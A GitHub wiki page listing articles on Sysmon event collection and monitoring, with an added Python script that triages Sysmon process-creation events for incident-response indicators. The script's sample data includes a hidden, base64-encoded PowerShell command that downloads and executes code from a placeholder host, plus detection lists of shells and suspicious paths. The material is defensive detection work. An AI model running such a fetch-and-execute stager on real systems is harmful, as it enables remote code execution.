Sysmon related - PSJoshi/Notes GitHub Wiki
- Sysmon 6 Windows event collection - https://community.rsa.com/community/products/netwitness/blog/2017/02/28/log-sysmon-6-windows-event-collection
- Enhance windows security with sysmon - https://www.graylog.org/blog/83-back-to-basics-enhance-windows-security-with-sysmon-and-graylog
- Sysmon powershell module - https://www.darkoperator.com/blog/2017/2/17/posh-sysmon-powershell-module-for-creating-sysmon-configuration-files
- Sending Windows logs to Elasticsearch 5.x with Winlogbeat 5.x - http://syspanda.com/index.php/2017/02/07/setting-up-elasticsearch-5-x-sending-windows-logs-using-winlogbeat-5-x/
- Parsing sysmon events for IR indicators - https://www.crowdstrike.com/blog/sysmon-2/
- User behaviour analytics - https://logrhythm.com/blog/understanding-insider-threats-with-ueba/
- Monitoring suspicious activities using Sysmon - https://blogs.technet.microsoft.com/motiba/2017/12/07/sysinternals-sysmon-suspicious-activity-guide/
- Command line logging - https://blog.defencelogic.io/security-information-event-management-design-why-you-need-enhanced-logging-on-windows-using-sysmon/
- Spotting the adversary with Windows event logs - https://www.iad.gov/iad/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm
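Added example (not code from this wiki or from any of the linked posts): a small Python triage of Sysmon Event ID 1 (process creation) records in the Windows Event XML form that Winlogbeat and Windows Event Forwarding ship, tying together the "command line logging" and "parsing Sysmon events for IR indicators" entries above. The three indicator rules (encoded PowerShell, an Office application spawning a shell, execution from a user-writable directory), the sample events and the paths in them are constructed assumptions for illustration, not a complete ruleset.

```python
"""Triage Sysmon Event ID 1 records for a few common IR indicators.

Constructed example: the events are hand-built in the schema Sysmon writes
to Microsoft-Windows-Sysmon/Operational, trimmed to the fields the rules use.
"""
import base64
import ntpath
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Illustrative rule data (assumptions, extend for your environment).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")
# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the usual ones.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def parse_sysmon_event(xml_text):
    """Return {'EventID': int, <Data Name>: value, ...} for one event record."""
    root = ET.fromstring(xml_text)
    fields = {"EventID": int(root.findtext("e:System/e:EventID", namespaces=NS))}
    for data in root.findall("e:EventData/e:Data", NS):
        fields[data.get("Name")] = data.text or ""
    return fields


def decode_encoded_command(blob):
    """-EncodedCommand payloads are base64 of UTF-16LE script text."""
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def indicators(ev):
    """Return a list of (rule, detail) hits for one parsed Event ID 1 record."""
    if ev.get("EventID") != 1:
        return []
    image_path = ev.get("Image", "")
    image = ntpath.basename(image_path).lower()
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    cmdline = ev.get("CommandLine", "")
    hits = []
    m = ENCODED_RE.search(cmdline)
    if image == "powershell.exe" and m:
        hits.append(("encoded_powershell", decode_encoded_command(m.group(1))))
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append(("office_spawns_shell", f"{parent} -> {image}"))
    if any(p in image_path.lower() for p in USER_WRITABLE):
        hits.append(("exec_from_user_writable_path", image_path))
    return hits


def triage(records):
    """Map record index -> indicator hits, keeping only records with hits."""
    return {i: hits for i, rec in enumerate(records)
            if (hits := indicators(parse_sysmon_event(rec)))}


def make_event(image, cmdline, parent):
    """Build a constructed Sysmon-style Event ID 1 record."""
    return f"""<Event xmlns="{NS['e']}">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">{escape(image)}</Data>
    <Data Name="CommandLine">{escape(cmdline)}</Data>
    <Data Name="ParentImage">{escape(parent)}</Data>
  </EventData>
</Event>"""


# Constructed sample input: a stager launched from Word, a binary run from
# %TEMP%, and a benign notepad launch. The URL is a placeholder.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    make_event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               f"powershell.exe -nop -w hidden -enc {ENC}",
               r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    make_event(r"C:\Users\alice\AppData\Local\Temp\update.exe",
               "update.exe /silent", r"C:\Windows\explorer.exe"),
    make_event(r"C:\Windows\System32\notepad.exe",
               "notepad.exe readme.txt", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        for rule, detail in hits:
            print(f"event {idx}: {rule}: {detail}")
```

The same `parse_sysmon_event` works on records exported with `wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml` or on the `event.original` field Winlogbeat can keep; only the rule table needs tuning per environment.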